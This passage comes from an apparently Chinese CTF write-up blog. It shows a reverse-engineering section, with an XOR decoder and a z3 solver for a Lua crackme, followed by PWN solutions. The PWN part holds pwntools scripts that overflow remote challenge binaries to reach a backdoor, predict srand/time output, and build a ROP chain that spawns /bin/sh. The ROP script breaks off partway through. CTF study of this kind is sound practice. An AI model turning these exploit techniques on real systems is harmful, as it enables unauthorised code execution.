class="hljs-variable">sb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">StringBuilder</span>();<br> <span class="hljs-type">int</span> <span class="hljs-variable">length</span> <span class="hljs-operator">=</span> bArr.length;<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> <span class="hljs-variable">i</span> <span class="hljs-operator">=</span> <span class="hljs-number">0</span>; i < length; i++) {<br> sb.append(String.format(<span class="hljs-string">"%02x"</span>, Byte.valueOf(bArr[i])));<br> }<br> <span class="hljs-keyword">return</span> sb.toString();<br> }<br>}<br></code></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">key = [-<span class="hljs-number">50</span>, <span class="hljs-number">67</span>, <span class="hljs-number">40</span>, <span class="hljs-number">58</span>, -<span class="hljs-number">9</span>, <span class="hljs-number">61</span>, <span class="hljs-number">16</span>, <span class="hljs-number">104</span>, <span class="hljs-number">21</span>, -<span class="hljs-number">2</span>, <span class="hljs-number">82</span>, -<span class="hljs-number">109</span>, -<span class="hljs-number">76</span>, <span class="hljs-number">116</span>, -<span class="hljs-number">11</span>, <span class="hljs-number">48</span>, -<span class="hljs-number">99</span>, <span class="hljs-number">68</span>, <span class="hljs-number">6</span>, <span class="hljs-number">60</span>, <span class="hljs-number">127</span>, -<span class="hljs-number">34</span>, <span class="hljs-number">25</span>, <span class="hljs-number">83</span>, <span class="hljs-number">51</span>, <span class="hljs-number">0</span>,<br> -<span class="hljs-number">58</span>, <span class="hljs-number">6</span>, <span class="hljs-number">3</span>, -<span class="hljs-number">33</span>, -<span class="hljs-number">27</span>, <span class="hljs-number">40</span>, -<span class="hljs-number">47</span>, -<span class="hljs-number">102</span>, -<span class="hljs-number">18</span>, <span class="hljs-number">47</span>, <span class="hljs-number">109</span>, -<span class="hljs-number">74</span>, <span class="hljs-number">21</span>, <span class="hljs-number">25</span>, <span class="hljs-number">30</span>, <span class="hljs-number">69</span>, ]<br>enc = [-<span class="hljs-number">88</span>,<span class="hljs-number">47</span>,<span class="hljs-number">73</span>,<span class="hljs-number">93</span>,-<span class="hljs-number">116</span>,<span class="hljs-number">11</span>,<span class="hljs-number">35</span>,<span class="hljs-number">81</span>,<span class="hljs-number">32</span>,-<span class="hljs-number">53</span>,<span class="hljs-number">107</span>,-<span class="hljs-number">95</span>,-<span class="hljs-number">125</span>,<span class="hljs-number">89</span>,-<span class="hljs-number">64</span>,<span class="hljs-number">81</span>,-<span class="hljs-number">81</span>,<span class="hljs-number">115</span>,<span class="hljs-number">43</span>,<span class="hljs-number">8</span>,<span class="hljs-number">74</span>,-<span class="hljs-number">22</span>,<span class="hljs-number">122</span>,<span class="hljs-number">126</span>,<span class="hljs-number">80</span>,<span class="hljs-number">100</span>,-<span class="hljs-number">91</span>,<span class="hljs-number">49</span>,<span class="hljs-number">46</span>,-<span class="hljs-number">24</span>,-<span class="hljs-number">121</span>,<span class="hljs-number">31</span>,-<span class="hljs-number">78</span>,-<span class="hljs-number">7</span>,-<span class="hljs-number">41</span>,<span class="hljs-number">31</span>,<span class="hljs-number">95</span>,-<span class="hljs-number">122</span>,<span class="hljs-number">115</span>,<span class="hljs-number">45</span>,<span class="hljs-number">40</span>,<span class="hljs-number">56</span>,<span class="hljs-number">81</span>,<span class="hljs-number">26</span>,-<span class="hljs-number">10</span>,-<span class="hljs-number">25</span>,<span class="hljs-number">105</span>,-<span class="hljs-number">36</span>,-<span class="hljs-number">21</span>,<span class="hljs-number">59</span>,<span class="hljs-number">122</span>,-<span class="hljs-number">97</span>,-<span class="hljs-number">89</span>,-<span class="hljs-number">102</span>,<span class="hljs-number">81</span>,-<span class="hljs-number">116</span>,<span class="hljs-number">52</span>,-<span class="hljs-number">61</span>,-<span class="hljs-number">106</span>,<span class="hljs-number">85</span>,-<span class="hljs-number">81</span>,-<span class="hljs-number">54</span>,-<span class="hljs-number">123</span>,<span class="hljs-number">119</span>,<br>-<span class="hljs-number">32</span>,<span class="hljs-number">32</span>,<span class="hljs-number">105</span>,-<span class="hljs-number">37</span>,-<span class="hljs-number">117</span>,<span class="hljs-number">6</span>,-<span class="hljs-number">128</span>,<span class="hljs-number">89</span>,<span class="hljs-number">2</span>,-<span class="hljs-number">4</span>,-<span class="hljs-number">21</span>,-<span class="hljs-number">118</span>,-<span class="hljs-number">94</span>,-<span class="hljs-number">81</span>,<span class="hljs-number">103</span>,<span class="hljs-number">26</span>,<span class="hljs-number">21</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(key)):<br> tmp = key[i] ^ enc[i]<br> <span class="hljs-keyword">if</span> tmp < <span class="hljs-number">0</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(-tmp), end=<span class="hljs-string">''</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(tmp), end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h3 id="WEEK3-crackme"><a href="#WEEK3-crackme" class="headerlink" title="[WEEK3]crackme"></a>[WEEK3]crackme</h3><p><a href="https://www.luatool.cn/index.php">Lua 工具箱 (luatool.cn)</a></p><p>PE提示这是个lua代码,那么我们去在线网站直接解密一下</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231105141117807.png" alt="image-20231105141117807"></p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs lua"><span class="hljs-built_in">print</span>(<span class="hljs-string">"please input your flag:"</span>)<br>flag = <span class="hljs-built_in">io</span>.<span class="hljs-built_in">read</span>()<br>code = {}<br>secret = {<br> <span class="hljs-number">54</span>, <span class="hljs-number">57</span>, <span class="hljs-number">566</span>, <span class="hljs-number">532</span>, <span class="hljs-number">1014</span>, <span class="hljs-number">1</span>, <span class="hljs-number">7</span>, <span class="hljs-number">508</span>, <span class="hljs-number">10</span>, <span class="hljs-number">12</span>, <span class="hljs-number">498</span>, <span class="hljs-number">494</span>, <span class="hljs-number">6</span>, <span class="hljs-number">24</span>, <span class="hljs-number">14</span>, <span class="hljs-number">20</span>, <span class="hljs-number">489</span>, <span class="hljs-number">492</span>, <span class="hljs-number">0</span>, <span class="hljs-number">10</span>, <span class="hljs-number">490</span>, <span class="hljs-number">498</span>, <span class="hljs-number">517</span>, <span class="hljs-number">539</span>, <span class="hljs-number">21</span>, <span class="hljs-number">528</span>, <span class="hljs-number">517</span>, <span class="hljs-number">530</span>, <span class="hljs-number">543</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">51</span>, <span class="hljs-number">562</span>, <span class="hljs-number">518</span>, <span class="hljs-number">9</span>, <span class="hljs-number">0</span>, <span class="hljs-number">516</span>, <span class="hljs-number">6</span>, <span class="hljs-number">2</span>, <span class="hljs-number">572</span>, <span class="hljs-number">2</span>, <span class="hljs-number">515</span>, <span class="hljs-number">60</span>, <span class="hljs-number">63</span>, <span class="hljs-number">62</span>, <span class="hljs-number">570</span>, <span class="hljs-number">553</span>, <span class="hljs-number">31</span>, <span class="hljs-number">1</span>, <span class="hljs-number">594</span>, <span class="hljs-number">117</span>, <span class="hljs-number">15</span><br>}<br>l = <span class="hljs-built_in">string</span>.<span class="hljs-built_in">len</span>(flag)<br><span class="hljs-keyword">for</span> i = <span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> num = ((<span class="hljs-built_in">string</span>.<span class="hljs-built_in">byte</span>(flag, i) + i) % <span class="hljs-number">333</span> + <span class="hljs-number">444</span>) % <span class="hljs-number">555</span> - <span class="hljs-number">1</span><br> <span class="hljs-built_in">table</span>.<span class="hljs-built_in">insert</span>(code, num)<br><span class="hljs-keyword">end</span><br><span class="hljs-keyword">for</span> i = <span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> x = i - <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> i + <span class="hljs-number">2</span> >= l <span class="hljs-keyword">then</span><br> code[i] = code[i % l + <span class="hljs-number">1</span>] ~ code[(i + <span class="hljs-number">1</span>) % l + <span class="hljs-number">1</span>]<br> <span class="hljs-keyword">else</span><br> code[i] = code[(i + <span class="hljs-number">1</span>) % l] ~ code[(i + <span class="hljs-number">2</span>) % l]<br> <span class="hljs-keyword">end</span><br><span class="hljs-keyword">end</span><br><span class="hljs-keyword">for</span> i = <span class="hljs-number">1</span>, l <span class="hljs-keyword">do</span><br> <span class="hljs-keyword">if</span> secret[i] ~= code[i] <span class="hljs-keyword">then</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Incorrect"</span>)<br> <span class="hljs-keyword">return</span><br> <span class="hljs-keyword">end</span><br><span class="hljs-keyword">end</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">"You win,flag is"</span>, flag)<br><br></code></pre></td></tr></table></figure><p>z3约束:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># z3 can't solve problems like x%100==1(these mod value equation)</span><br><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> *<br><br>s = Solver() <br>secret = [<span class="hljs-number">54</span>, <span class="hljs-number">57</span>, <span class="hljs-number">566</span>, <span class="hljs-number">532</span>, <span class="hljs-number">1014</span>, <span class="hljs-number">1</span>, <span class="hljs-number">7</span>, <span class="hljs-number">508</span>, <span class="hljs-number">10</span>, <span class="hljs-number">12</span>, <span class="hljs-number">498</span>, <span class="hljs-number">494</span>, <span class="hljs-number">6</span>, <span class="hljs-number">24</span>, <span class="hljs-number">14</span>, <span class="hljs-number">20</span>, <span class="hljs-number">489</span>, <span class="hljs-number">492</span>, <span class="hljs-number">0</span>, <span class="hljs-number">10</span>, <span class="hljs-number">490</span>, <span class="hljs-number">498</span>, <span class="hljs-number">517</span>, <span class="hljs-number">539</span>, <span class="hljs-number">21</span>,<br> <span class="hljs-number">528</span>, <span class="hljs-number">517</span>, <span class="hljs-number">530</span>, <span class="hljs-number">543</span>, <span class="hljs-number">9</span>, <span class="hljs-number">13</span>, <span class="hljs-number">0</span>, <span class="hljs-number">4</span>, <span class="hljs-number">51</span>, <span class="hljs-number">562</span>, <span class="hljs-number">518</span>, <span class="hljs-number">14</span>, <span class="hljs-number">527</span>, <span class="hljs-number">520</span>, <span class="hljs-number">0</span>, <span class="hljs-number">517</span>, <span class="hljs-number">57</span>, <span class="hljs-number">575</span>, <span class="hljs-number">512</span>, <span class="hljs-number">1</span>, <span class="hljs-number">572</span>, <span class="hljs-number">515</span>, <span class="hljs-number">60</span>, <span class="hljs-number">18</span>, <span class="hljs-number">31</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">594</span>, <span class="hljs-number">117</span>, <span class="hljs-number">15</span>]<br>l = <span class="hljs-built_in">len</span>(secret)<br>flag = [BitVec(<span class="hljs-string">'%d'</span> % i, <span class="hljs-number">12</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l)]<br>code = flag[:]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">52</span>):<br> code[i] = code[i + <span class="hljs-number">1</span>] ^ code[i + <span class="hljs-number">2</span>]<br>code[<span class="hljs-number">52</span>] = code[<span class="hljs-number">53</span>] ^ code[<span class="hljs-number">0</span>]<br>code[<span class="hljs-number">53</span>] = code[<span class="hljs-number">0</span>] ^ code[<span class="hljs-number">1</span>]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l):<br> s.add(secret[i] == code[i])<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">crack</span>(<span class="hljs-params">a, b</span>):<br> <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">128</span>):<br> <span class="hljs-keyword">if</span> ((x + b) % <span class="hljs-number">333</span> + <span class="hljs-number">444</span>) % <span class="hljs-number">555</span> - <span class="hljs-number">1</span> == a:<br> <span class="hljs-keyword">return</span> x<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">ord</span>(<span class="hljs-string">'f'</span>)<br><br><br><span class="hljs-keyword">if</span> s.check() == sat:<br> m = s.model()<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">''</span>.join([<span class="hljs-built_in">chr</span>(crack(m[flag[i]], i + <span class="hljs-number">1</span>)) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(l)]))<br></code></pre></td></tr></table></figure><blockquote><p>在这段代码中,m是Solver生成的一个模型,用于保存求解结果。</p><p>flag是一个由BitVec组成的列表,表示未知变量。</p><p>m[1]表示取模型m中键为1的值,但是m中没有键为整数1,所以会报错。</p><p>m[flag[1]]表示取models中键为flag[1]的值,相当于取键为flag列表中第二个元素的值。</p><p>flag列表在代码中初始化为:</p><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-keyword">python</span><br><br>Copy code<br><br>flag = [BitVec(<span class="hljs-string">'[*]%d'</span> % i , <span class="hljs-number">12</span>) <span class="hljs-keyword">for</span> i in <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>)]<br></code></pre></td></tr></table></figure><p>所以flag[1]对应的是BitVec(‘[*]1’, 12),也就是第二个未知变量。</p><p>模型m中确实有这个键,所以可以正确打印出键为flag[1]的值。</p><p>总结一下:</p><p>m[1]: 错误访问,模型m没有整数键1</p><p>m[flag[1]]: 正确访问,取出模型中的第二个未知变量</p><p>所以两者输出不同,一个报错一个可以正确打印值。</p><p>区别在于m[flag[1]]通过flag列表 indirect 访问了模型的一个键,而m[1]直接以整数1为键访问,该键并不存在。</p></blockquote><h3 id="喵?喵。喵!"><a href="#喵?喵。喵!" class="headerlink" title="喵?喵。喵!"></a>喵?喵。喵!</h3><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h3 id="WEEK1-nc"><a href="#WEEK1-nc" class="headerlink" title="[WEEK1]nc"></a>[WEEK1]nc</h3><p>直接连上cat flag</p><h3 id="WEEK1-四则计算器"><a href="#WEEK1-四则计算器" class="headerlink" title="[WEEK1] 四则计算器"></a>[WEEK1] 四则计算器</h3><p>strlen遇到/x00,停止读取来溢出,跳过长度判断</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(os=<span class="hljs-string">'linux'</span>, arch=<span class="hljs-string">'amd64'</span>, log_level=<span class="hljs-string">'debug'</span>)<br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># p = gdb.debug('./ret2text')</span><br><span class="hljs-comment"># p = process('./ret2text')</span><br><br>p = remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">32774</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(r)<br> pause()<br><br><br>backdoor = p64(<span class="hljs-number">0x4015E1</span>)<br><br>pad = <span class="hljs-string">b'\x00'</span>*(<span class="hljs-number">0x32</span>+<span class="hljs-number">8</span>)<br><br>payload = pad + backdoor<br><br>p.sendlineafter(<span class="hljs-string">'>'</span>,payload)<br><br>p.interactive()<br></code></pre></td></tr></table></figure><h3 id="WEEK1-口算题"><a href="#WEEK1-口算题" class="headerlink" title="[WEEK1]口算题"></a>[WEEK1]口算题</h3><p>交互题目,但是其中包含了两unicode字符,我们修改一下将其解码成utf-8编码就好了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><br>p = remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">30687</span>)<br>p.sendlineafter(<span class="hljs-string">b'start...'</span>, <span class="hljs-string">b''</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">200</span>):<br> p.recvline()<br> a = p.recvline().decode(<span class="hljs-string">'utf-8'</span>)<br> a = a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br> a = a.replace(<span class="hljs-string">'÷'</span>, <span class="hljs-string">'/'</span>)<br> a = a.replace(<span class="hljs-string">'×'</span>, <span class="hljs-string">'*'</span>)<br> <span class="hljs-built_in">print</span>(a)<br> r = <span class="hljs-built_in">eval</span>(a)<br> p.sendline(<span class="hljs-built_in">str</span>(r))<br> p.recvline()<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-猜数游戏"><a href="#WEEK1-猜数游戏" class="headerlink" title="[WEEK1]猜数游戏"></a>[WEEK1]猜数游戏</h3><p>经典猜数</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> * <br>dll = cdll.LoadLibrary(<span class="hljs-string">'libc.so.6'</span>)<br>context(os=<span class="hljs-string">'linux'</span>, arch=<span class="hljs-string">'amd64'</span>, log_level=<span class="hljs-string">'debug'</span>)<br>ip, port = <span class="hljs-string">'112.6.51.212:32778'</span>.split(<span class="hljs-string">':'</span>)<br>p = remote(ip ,port)<br><br>a = dll.srand(dll.time(<span class="hljs-number">0</span>))<br>b=dll.rand()<br><br><span class="hljs-comment"># p.recvuntil(b'number?')</span><br>p.sendlineafter(<span class="hljs-string">'number?'</span>,<span class="hljs-string">b'11'</span>)<br>p.sendline(<span class="hljs-built_in">str</span>(b))<br><span class="hljs-built_in">print</span>(b)<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h3 id="WEEK1-hard-nc"><a href="#WEEK1-hard-nc" class="headerlink" title="[WEEK1]hard nc"></a>[WEEK1]hard nc</h3><p>gift2里有个base64,解密即可</p><blockquote><p>MWYtOTdlNi0wMzBiNTNlNjdkODN9Cg==</p></blockquote><p>ls -a,可以看到隐藏的文件,然后直接</p><blockquote><p>cd .gift ##别忘了(.)</p></blockquote><h3 id="WEEK1-ropchain"><a href="#WEEK1-ropchain" class="headerlink" title="[WEEK1]ropchain"></a>[WEEK1]ropchain</h3><p>题目就已知是使用ROPgadget做了,那我们能干什么,直接顺从</p><blockquote><p>ROPgadget –binary 文件名 –ropchain</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><br>context.log_level = <span class="hljs-string">'debug'</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br><span class="hljs-comment"># p=process('chal')</span><br>pl=remote(<span class="hljs-string">'112.6.51.212'</span>,<span class="hljs-number">32783</span>)<br><span class="hljs-comment"># p=gdb.debug('./chal')</span><br><span class="hljs-comment"># p=remote("node3.buuoj.cn",28477)</span><br><span class="hljs-comment">#p=process('./wustctf2020_name_your_cat')</span><br><span class="hljs-comment"># elf=ELF('./wustctf2020_name_your_cat')</span><br><br><span class="hljs-comment"># Padding goes here</span><br>p = <span class="hljs-string">b'a'</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c0</span>) <span class="hljs-comment"># @ .data</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000419a1c</span>) <span class="hljs-comment"># pop rax ; ret</span><br>p += <span class="hljs-string">b'/bin//sh'</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000041ac41</span>) <span class="hljs-comment"># mov qword ptr [rsi], rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000417e25</span>) <span class="hljs-comment"># xor rax, rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000041ac41</span>) <span class="hljs-comment"># mov qword ptr [rsi], rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401d1d</span>) <span class="hljs-comment"># pop rdi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c0</span>) <span class="hljs-comment"># @ .data</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000040a30d</span>) <span class="hljs-comment"># pop rsi ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000401858</span>) <span class="hljs-comment"># pop rdx ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x000000000049d0c8</span>) <span class="hljs-comment"># @ .data + 8</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000417e25</span>) <span class="hljs-comment"># xor rax, rax ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span class="hljs-number">0x0000000000450860</span>) <span class="hljs-comment"># add rax, 1 ; ret</span><br>p += pack(<span class="hljs-string">'<Q'</span>, <span 